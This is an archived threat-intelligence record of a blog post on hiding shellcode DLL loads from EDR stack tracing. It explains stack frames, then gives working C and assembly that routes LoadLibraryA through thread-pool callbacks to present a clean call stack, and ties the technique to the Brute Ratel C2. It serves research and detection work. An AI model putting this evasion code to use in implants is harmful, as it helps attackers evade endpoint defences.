{
	"id": "eb9cb183-69d7-45d7-8db5-1b43285dedf9",
	"created_at": "2026-04-06T00:07:04.658309Z",
	"updated_at": "2026-04-10T03:21:05.767612Z",
	"deleted_at": null,
	"sha1_hash": "3ff4e1afb56f452436f9e6209a4b246fe3094dc3",
	"title": "Hiding In PlainSight - Proxying DLL Loads To Hide From ETWTI Stack Tracing",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 431255,
	"plain_text": "Hiding In PlainSight - Proxying DLL Loads To Hide From ETWTI\r\nStack Tracing\r\nArchived: 2026-04-05 17:50:36 UTC\r\nPosted on 26 Jan 2023 by Paranoid Ninja\r\nNOTE: This is a PART I blog on Stack Tracing evasion. PART II can be found here.\r\nIt has been a while since I actually wrote any blog on Dark Vortex (not counting the Brute Ratel ones, just raw\r\nresearch), thus I decided to add the post here. This blog provides a high-level overview of stack tracing, how\r\nEDR/AVs use it for detections, the usage of ETWTI telemetry and what can be done to evade it. Last year, I\r\nposted a blog on Brute Ratel, which was the first Command \u0026 Control to provide built-in proxying of DLL loads\r\nto avoid detections. This was later adopted by other C2s like Nighthawk with a different set of APIs\r\n(RtlQueueWorkItem). Thus, before we discuss evasion, let’s first understand why stack tracing\r\nis important for EDRs.\r\nWhat Is A Stack?\r\nThe simplest way to describe a ‘Stack’ in computer science is as a temporary memory space where local variables\r\nand function arguments are stored with non-executable permissions. The stack holds a lot of information\r\nabout a thread and the function it is currently executing. Whenever your process starts a new thread, a\r\nnew stack is created. The stack grows from bottom to top (towards lower addresses on x86 and x64) and works in a linear fashion, which means it follows the Last\r\nIn, First Out principle. The ‘RSP’ (x64) or ‘ESP’ (x86) register stores the current stack pointer of the thread. The\r\ndefault stack size for a new thread in Windows is 1 megabyte unless explicitly changed by the developer during the\r\ncreation of the thread. This means, if the developer does not calculate and increase the stack size while coding, the\r\nstack might end up hitting the stack boundary (the guard page at the end of the stack) and raise an exception. 
Usually,\r\nit is the task of the _chkstk routine within msvcrt.dll to probe the stack, and raise an exception if more stack is\r\nrequired. Thus if you write a position-independent shellcode which requires a large stack (as everything in PIC is\r\nstored on the stack), your shellcode will crash with an exception, since your PIC will not be linked to the _chkstk\r\nroutine within msvcrt.dll. Once your thread starts, it may execute several functions and\r\nuse many different types of variables. Unlike the heap, which needs to be allocated and freed manually, we\r\ndon’t have to manually calculate the stack. When the compiler (mingw gcc or clang) compiles the C/C++ code, it\r\nautomatically calculates the stack required and adds the required instructions to the code. Thus when your thread runs, it\r\nwill first allocate the ‘x’ size on the stack from the reserved stack of 1 MB. Take the example below:\r\nvoid samplefunction() {\r\n char test[8192];\r\n}\r\nhttps://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/\r\nPage 1 of 8\n\nIn the above function, we are simply creating a variable of 8192 bytes, but this will not be stored within the PE as\r\nit would unnecessarily end up eating space on disk. Thus such variables are optimized by compilers and converted to\r\ninstructions such as:\r\nsub rsp, 0x2000\r\nThe above assembly code subtracts 0x2000 bytes (8192 decimal) from the stack pointer, reserving space which will be utilized by the function\r\nduring runtime. In short, if your code needs to clean up some stack space, it will add bytes to the stack pointer, whereas if it\r\nrequires some stack space, it will subtract from the stack pointer. Each function’s stack within the thread forms\r\na block called a stack frame. 
Stack frames provide a clear and concise view of which function was\r\nlast called, from which area in memory, how much stack is being used by that frame, what variables are stored\r\nin the frame and where the current function needs to return to. Every time your function calls another function,\r\nthe return address inside your current function is pushed to the stack, so that when the next function executes ‘ret’ or return, it returns to\r\nthe current function to continue execution. Once your current function returns to the previous function,\r\nthe stack frame of the current function gets destroyed. Not completely though: it can still be accessed, but it mostly\r\nends up being overwritten by the next function which gets called. To explain it like I would to a 5 year old, it\r\nwould go like this:\r\nvoid func3() {\r\n char test[2048];\r\n \r\n return;\r\n}\r\nvoid func2() {\r\n char test[4096];\r\n func3();\r\n}\r\nvoid func1() {\r\n char test[8192];\r\n func2();\r\n}\r\nThe above code gets converted to assembly like this:\r\nfunc3:\r\n sub rsp, 0x800\r\n \r\n add rsp, 0x800\r\n ret\r\nfunc2:\r\n sub rsp, 0x1000\r\n call func3\r\n add rsp, 0x1000\r\n ret\r\nfunc1:\r\n sub rsp, 0x2000\r\n call func2\r\n add rsp, 0x2000\r\n ret\r\nWell, a 5 year old won’t understand it, but when do you find a 5 year old writing malware, right? XD! Thus, each\r\nstack frame will contain the bytes allocated for variables, the return address which was pushed to the stack by the\r\nprevious function and information about the current function’s local variables (in a nutshell).\r\nWhere’s THE ‘D’ in EDR here?\r\nThe technique for detection is extremely smart here. Some EDRs use userland hooks, whereas some use ETW to\r\ncapture the stack telemetry. For example, say you want to execute your shellcode without module stomping. 
So,\r\nyou allocate some memory via VirtualAlloc or its NTAPI counterpart NtAllocateVirtualMemory, then copy your\r\nshellcode and execute it. Now your shellcode might have its own dependencies and it might call LoadLibraryA\r\nor LdrLoadDll to load a DLL from disk into memory. If your EDR uses userland hooks, it might have already\r\nhooked LoadLibrary and LdrLoadDll, in which case it can check the return address pushed to the stack by your\r\nRX shellcode region. This is specific to some EDRs like SentinelOne, CrowdStrike etc., which will instantly kill\r\nyour payload. Other EDRs like Microsoft Defender ATP (MDATP), Elastic and FortiEDR will use ETW or kernel\r\ncallbacks to check where the LoadLibrary call originated from. The stack trace will provide the complete chain\r\nof return addresses and all the functions through which the call to LoadLibrary was made. In short, if you execute\r\na DLL Sideload which executes your shellcode which calls LoadLibrary, it would look like this:\r\n|-----------Top Of The Stack-----------|\r\n| |\r\n| |\r\n|--------------------------------------|\r\n|------Stack Frame of LoadLibrary------|\r\n| Return address in RX region |\r\n| |\r\n|----------Stack Frame of RX-----------| \u003c- Detection (An unbacked RX region should never call LoadLibraryA)\r\n| Return address of PE on disk |\r\n| |\r\n|-----------Stack Frame of PE----------|\r\n| Return address of RtlUserThreadStart |\r\n| |\r\n|---------Bottom Of The Stack----------|\r\nThis means any EDR which hooks LoadLibrary in usermode or via kernel callbacks/ETW can check the last\r\nreturn address region or where the call came from. In the v1.1 release of BRc4, I started using the\r\nRtlRegisterWait API, which can request a worker thread in the thread pool to execute LoadLibraryA in a separate\r\nthread to load the library. 
Once the library is loaded, we can extract its base address by simply walking the PEB\r\n(Process Environment Block). Nighthawk later adapted this technique to the RtlQueueWorkItem API, which is the\r\nmain NTAPI behind QueueUserWorkItem and can also queue a request to a worker thread to load a library with\r\na clean stack. However, this was researched by Proofpoint sometime last year in their blog, and lately Joe\r\nDesimone from Elastic also posted a tweet about the RtlRegisterWait API being used by BRc4. This meant\r\nsooner or later, detections would come around it and there was a need for more such APIs which can be used for\r\nfurther evasion. Thus I decided to spend some time reversing some undocumented APIs from ntdll and found\r\nat least 27 different callbacks which, with a little tweaking and hacking, can be exploited to load our DLL with\r\na clean stack.\r\nWindows Callbacks: Allow Us To Introduce Ourselves\r\nCallback functions are pointers to a function which can be passed on to other functions to be executed inside\r\nthem. Microsoft provides an insane amount of callbacks for software developers to execute code via other\r\nfunctions. A lot of these functions can be found in this GitHub repository and have been exploited quite widely\r\nover the past two years. However, there is a major issue with all those callbacks. When you execute a callback,\r\nyou don’t want the callback to run in the same thread as your caller. Which means, you don’t want the stack\r\ntrace to follow a trail like: LoadLibrary returns to -\u003e Callback Function returns to -\u003e RX region. In order\r\nto have a clean stack, we need to make sure our LoadLibrary executes in a separate thread independent of our RX\r\nregion, and if we use callbacks, we need the callbacks to be able to pass proper parameters to LoadLibraryA.\r\nMost callbacks in Windows either don’t have parameters, or don’t forward the parameters ‘as is’ to our target\r\nfunction ‘LoadLibrary’. 
Take the code below as an example:\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\nint main() {\r\n CHAR *libName = \"wininet.dll\";\r\n PTP_WORK WorkReturn = NULL;\r\n TpAllocWork(\u0026WorkReturn, LoadLibraryA, libName, NULL);\r\n TpPostWork(WorkReturn);\r\n TpReleaseWork(WorkReturn);\r\n WaitForSingleObject((HANDLE)-1, 1000);\r\n printf(\"hWininet: %p\\n\", GetModuleHandleA(libName));\r\n return 0;\r\n}\r\nIf you compile and run the above code, it will crash. The reason is that the definition of TpAllocWork is:\r\nNTSTATUS NTAPI TpAllocWork(\r\n PTP_WORK* ptpWrk,\r\n PTP_WORK_CALLBACK pfnwkCallback,\r\n PVOID OptionalArg,\r\n PTP_CALLBACK_ENVIRON CallbackEnvironment\r\n);\r\nThis means our callback function LoadLibraryA should be of type PTP_WORK_CALLBACK. This type\r\nexpands to:\r\nVOID CALLBACK WorkCallback(\r\n PTP_CALLBACK_INSTANCE Instance,\r\n PVOID Context,\r\n PTP_WORK Work\r\n);\r\nAs can be seen in the above definition, our PVOID OptionalArg from the TpAllocWork API gets forwarded as\r\nthe second argument to our callback (PVOID Context). So if our hypothesis is correct, the argument libName\r\n(wininet.dll) that we passed to TpAllocWork will end up as the second argument to our LoadLibraryA. But\r\nLoadLibraryA DOES NOT have a second argument. Checking this in a debugger leads to the following image:\r\nSo this indeed created a clean stack like: LoadLibraryA returns to -\u003e TpPostWork returns to -\u003e\r\nRtlUserThreadStart, but our argument for LoadLibrary gets sent as the second argument, whereas the first\r\nargument is a pointer to a TP_CALLBACK_INSTANCE structure sent by the TpPostWork API. 
After a bit more\r\nreversing, I found that this structure is dynamically generated by TppWorkPost (NOT TpPostWork), which\r\nas expected is an internal function of ntdll.dll, and nothing much can be done without having the debug symbols\r\nfor this API.\r\nHowever, all hope is not yet lost. One of the dirty tricks we can try is to replace the callback passed to\r\nTpAllocWork, swapping LoadLibraryA for a custom function which then calls LoadLibraryA itself.\r\nSomething like this:\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\nVOID CALLBACK WorkCallback(\r\n _Inout_ PTP_CALLBACK_INSTANCE Instance,\r\n _Inout_opt_ PVOID Context,\r\n _Inout_ PTP_WORK Work\r\n) {\r\n LoadLibraryA((LPCSTR)Context);\r\n}\r\nint main() {\r\n CHAR *libName = \"wininet.dll\";\r\n PTP_WORK WorkReturn = NULL;\r\n TpAllocWork(\u0026WorkReturn, WorkCallback, libName, NULL);\r\n TpPostWork(WorkReturn);\r\n TpReleaseWork(WorkReturn);\r\n WaitForSingleObject((HANDLE)-1, 1000);\r\n printf(\"hWininet: %p\\n\", GetModuleHandleA(libName));\r\n return 0;\r\n}\r\nHowever, this means the callback will be in our RX region and the stack would become: LoadLibraryA returns\r\nto -\u003e Callback in RX Region returns to -\u003e TpPostWork returns to -\u003e RtlUserThreadStart, which is not good as we\r\nended up doing the same thing we were trying to avoid. The reason for this is the stack frame: when we call\r\nLoadLibraryA from our Callback in RX Region, we end up pushing the return address of the Callback in RX\r\nRegion on the stack, which ends up becoming a part of the stack frame. However, what if we manipulate the stack to\r\nNOT PUSH THE RETURN ADDRESS? 
Sure, we will have to write a few lines in assembly, but this should solve\r\nour issue entirely and we can have a direct call from TpPostWork to LoadLibrary without having the intricacies\r\nin between.\r\nThe Final Trick\r\n#include \u003cwindows.h\u003e\r\n#include \u003cstdio.h\u003e\r\ntypedef NTSTATUS (NTAPI* TPALLOCWORK)(PTP_WORK* ptpWrk, PTP_WORK_CALLBACK pfnwkCallback, PVOID Option\r\ntypedef VOID (NTAPI* TPPOSTWORK)(PTP_WORK);\r\ntypedef VOID (NTAPI* TPRELEASEWORK)(PTP_WORK);\r\nFARPROC pLoadLibraryA;\r\nUINT_PTR getLoadLibraryA() {\r\n return (UINT_PTR)pLoadLibraryA;\r\n}\r\nextern VOID CALLBACK WorkCallback(PTP_CALLBACK_INSTANCE Instance, PVOID Context, PTP_WORK Work);\r\nint main() {\r\n pLoadLibraryA = GetProcAddress(GetModuleHandleA(\"kernel32\"), \"LoadLibraryA\");\r\n FARPROC pTpAllocWork = GetProcAddress(GetModuleHandleA(\"ntdll\"), \"TpAllocWork\");\r\n FARPROC pTpPostWork = GetProcAddress(GetModuleHandleA(\"ntdll\"), \"TpPostWork\");\r\n FARPROC pTpReleaseWork = GetProcAddress(GetModuleHandleA(\"ntdll\"), \"TpReleaseWork\");\r\n CHAR *libName = \"wininet.dll\";\r\n PTP_WORK WorkReturn = NULL;\r\n ((TPALLOCWORK)pTpAllocWork)(\u0026WorkReturn, (PTP_WORK_CALLBACK)WorkCallback, libName, NULL);\r\n ((TPPOSTWORK)pTpPostWork)(WorkReturn);\r\n ((TPRELEASEWORK)pTpReleaseWork)(WorkReturn);\r\n WaitForSingleObject((HANDLE)-1, 0x1000);\r\n printf(\"hWininet: %p\\n\", GetModuleHandleA(libName));\r\n return 0;\r\n}\r\nASM Code for rerouting WorkCallback to LoadLibrary by manipulating the stack frame\r\nsection .text\r\nextern getLoadLibraryA\r\nglobal WorkCallback\r\nWorkCallback:\r\n mov rcx, rdx\r\n xor rdx, rdx\r\n call getLoadLibraryA\r\n jmp rax\r\nNow if you compile both of them together, our TpPostWork calls WorkCallback, but WorkCallback does not\r\ncall LoadLibraryA; it instead jumps to its pointer. 
WorkCallback simply moves the library name from the RDX\r\nregister to RCX, clears RDX, gets the address of LoadLibraryA from an ad hoc helper function and then jumps to\r\nLoadLibraryA, which ends up rearranging the whole stack frame without adding our return address. This ends up\r\nmaking the stack frame look like this:\r\nThe stack is clear as crystal with no signs of anything malevolent. After finding this technique, I started hunting\r\nfor other similar APIs which can be manipulated, and found that with just a few similar tweaks, you can\r\nactually implement proxy DLL loads with 27 other callbacks residing in kernel32, kernelbase and ntdll. I will\r\nleave it as an exercise for the readers of this blog to figure that out. For the users of Brute Ratel, you will find\r\nthese updates in the next release v1.5. That would be all for this blog and the full code can be found in my GitHub\r\nrepository.\r\nSource: https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/"
	],
	"report_names": [
		"proxying-dll-loads-for-hiding-etwti-stack-tracing"
	],
	"threat_actors": [],
	"ts_created_at": 1775434024,
	"ts_updated_at": 1775791265,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3ff4e1afb56f452436f9e6209a4b246fe3094dc3.pdf",
		"text": "https://archive.orkl.eu/3ff4e1afb56f452436f9e6209a4b246fe3094dc3.txt",
		"img": "https://archive.orkl.eu/3ff4e1afb56f452436f9e6209a4b246fe3094dc3.jpg"
	}
}